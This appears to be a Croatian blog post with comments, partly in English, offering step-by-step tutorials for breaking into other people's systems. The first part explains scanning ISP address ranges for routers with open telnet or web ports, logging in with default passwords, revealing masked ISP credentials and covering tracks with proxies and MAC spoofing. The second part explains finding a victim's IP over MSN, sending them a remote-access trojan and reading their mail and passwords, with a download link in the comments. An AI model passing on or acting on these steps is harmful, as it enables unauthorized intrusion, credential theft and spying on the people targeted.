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To sam pokupio s jedne stranice!!!!xDSL/Cabel router hackingVIDEO TUTORIAL(SVI koji ste dugo ekali da dobijete susjedov/frendov pass sada ste dosli na svoje!!!) This tutorial will explain to you how to hack someone's internet account thru his router.This hack is based on a secuirty exploit of the router's default password and the stupidity of the user.Explanation: when somebody buy's a xDSL/Cabel router, the router is set to manufactory defaults like IP range, user accounts, router table, and most important the security level. The last one we will exploit.Most routers will have a user friendly setup menu running on port 23 (telnet) and sometimes port 80 (http) or both.This is what we are looking for.Step 1.Get a multie IP range scanner like Axence NetTools 3.0(http://www.filetransit.com/go.php?id=32910-4-1).Get a xDSL/Cabel user IP range. This is a single user IP so the ip range of this Internet provider is 83.131.xxx.xxx most likely it will be from to .it also depends of your bandwidth how fast the scan will be finished.The IP adres above is just a example any IP range from a xDSL/Cabel provider can be used for this hack.before you start scanning specify the TCP/IP ports. You know that we are looking for TCP port 23 (telnet) and TCP port 80 (http) so edit the list and select only port 23 and port 80.Now start scanning and wait for the results.When finished scanning look for a IP that has a open port 23 and 80. Write them down or remember them.Step 2.Way 1This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and address (56.9 modem for example) when connection to the victim's router.Now get a telnet program. Windows has a standard telnet program just go to start,select run and type down "telnet" without the ", click or enter OK.Select "connect" than "Remote system" enter IP adres of the victim in the "host name" field press OK.wait for your computer to make a connection. This way only works when the router has a open telnet port service runningWay 2This is important: Most routers have connection log capability so the last thing you want to do is making a connection with your own broadband connection so use a anonymouse proxy server or dailup connection with a fake name and adres (56.9 modem for example) when connection to the victim's router.Open a Internet explorer windows enter the IP address of the victim after the http:// in the address bar.This way only works when the router has a open hyper text transfer protocol (http) service running.Step 3Entering the userfriendly setup menu. 9 out of 10 times the menu is protected by a loginname and password. When the user doesn't change any security value's the default password stay's usable.So the only thing you have to do is find out what type of router the victim uses. I use this tool:Axence NetTools 3.0 . is good. When you find out the type of router that's been used get the wright loginname and password from this list (get it here. not every router is on the list)TVORNICKE LOZINKE OD skoro svih routeraStep 4When you have a connection in telnet or internet expolorer you need to look for user accounts.PPP, PPtP, PPeP, PPoP, or such connection protocol. If this is not correct look for anything that maybe contains any info about the ISP account of the user.go to this option and open it. Most likely you will see a overview of user setup options.Now look for the username and password.In most case the username will be freely displayed so just write it down or what ever....The password is a different story. Allmost always the password is protected by ********* (stars) in the telnet way there is noway around it (goto another victim) but when you have a port 80 connection (http). Internet connection way open click right mouse key and select "View source" now look for the field where the star are at. most likely you can read it because in the source code the star are converted to normal ASCII text.If not get a "******** to text" convertor like snadboy's revelation V.2 (ovdje kliknuti) move the cursor over the ****** and....It's a miracle you can read the password.Now you have the username and password. There a million fun thing to do with that but more about that next time.check the tutorial page freqently.Tips.Beware on most routers only one person can be loget on simultaneous in the router setupmenu.Don't change anything in the router if you don't know what you are doing.Evo vam na hrvatskom tutorial i puno skrasen:1.Otvorite NetTools 3.02.Kliknite na Scan Network3.Postavite skenera da skenira Ports (range) i da skenira potove 23 - 804.Stavite da skenira odredjeni krug ip adrese kao npr. e skenirati sve ip adrese od do Scan!!6.Sada pronadjite modem/router koji ima otvorene portove 23 80 i napisite ip adresu od tog modema/router u Internet Explorer (bilo koja verzija)(napomena:Iskljucivo koristite Internet explorer a ne neki drugi kao sto je Firefox mozilla ili Opera ....)7.Pronadjite sifru za ulazak na modem8.Sada kliknite na WAN,pa WAN Setup,i sada vidite Login information i tamo je username i password koji je sakriven ispod ********.9.a)iskljucite antivirusb)pokrenite SnadBoy's Revelation v2 ,uzmite "Circled +" Cursori samo stavite preko sifre i sve ce ocitati,sada samo kopirajte username i password i napravite novu mrezu i mozete surfati na tudji racun !Ali obavezno sakrijte MAC adresu, a mozete ju sakrtit s ovim programom!Kratki tutorial:Pokrenete program kliknite na geberate random, gore izaberite uredjaj i kliknete changenakon toga ce vam ugasiti adsl i ponovno osposobiti, dok program to ucini mozete ga ugasiti jer ce vam taj mac tako ostati stalno.Ako ne vjerujete:Kliknite start --> Run --> cmdUpi?ite ipconfig/allI enter udariteVidjet cete da je mac onakav kakav je i u programu. __________________
25.11.2007. u 16:52 • 0 Komentara • Print • #
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Za pocetak da vam kazem na kakve bi sve probleme mogli naici prilikom upotrebe ovog kratkog tutoriala i svih njegovih djelova...Dakle, za pocetak izbrisite sve antivirusne i syware software sa svog PC-a ali vatrozid ostavite ukljucen. Anitivirusne programe morate iskluciti jer oni prepoznaju maliciozni kod koji sadrzi software koji cemo mi upotrebljavati u ovom tutorialu...Da krenemo na posao. Prvo trebate znati IP PC-a u koji zelite provaliti. U ovom tutorialu cete saznati kako pronaci IP koristeci msn. Taj nacin cu pokazati u ovom tutorialu a druge nacine cete morati sami otkriti, a jos jedan razlog sto ne pisem o tim nacinima: potrebno je veliko znanje o internet protokolima, internetu i racunalima opcenito te je vrlo komplicirano i traje 2-3 dana a i potrebno je mnogo improvizacije a danas vecina ISP-ova daje mogucnost koristenja proxy usluge koja svakom racunalu daje novi IP (koji nije pravi IP tog racunala)...IP cete pronaci na sljedeci nacin: * Pokrenite msn* Zapocmite razgovor sa vasom zrtvom.* U CMD-u upisite naredbu "netstat -n" i kliknite enter* Zatim upisite ponovno ali nemojte zadavati naredbu vec ostavite tako da pise* Posaljite datoteku server.exe (koju ste dobili sa software-om) vasoj zrtvi* Cim je slanje zapocelo (cim zrtva prihvati) kliknite enter u CMD-u i sad ce vam ponovno izbaciti listu IP-ova* Sad ce na listi biti jedna vise IP i to je IP vase zrtve* Sad kad imate IP, pokrenite Let me rule program i upisite tu IP u polje za to predvideno.* Sad kliknite "connect" ili prvu ikonu do polja gdje ste upisali IP*I voila. Spojeni ste za zrtvom i sad mozete citati njene tajne mailove, pass, ili sto god zelite.Kad downloadate fajl, raspakirajte ga negdje i to je to... ne zahtjeva nikakvu instalaciju.Fajl mozete downloadati na ovom linku: let_me_rule-hacking - download
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daj mi link za taj program jer ga ja nikako ne mogu naći
evo tu imaš sve : http://harmunt-kakonekomupastiukomp.blogspot.com/2011/10/ovako.html
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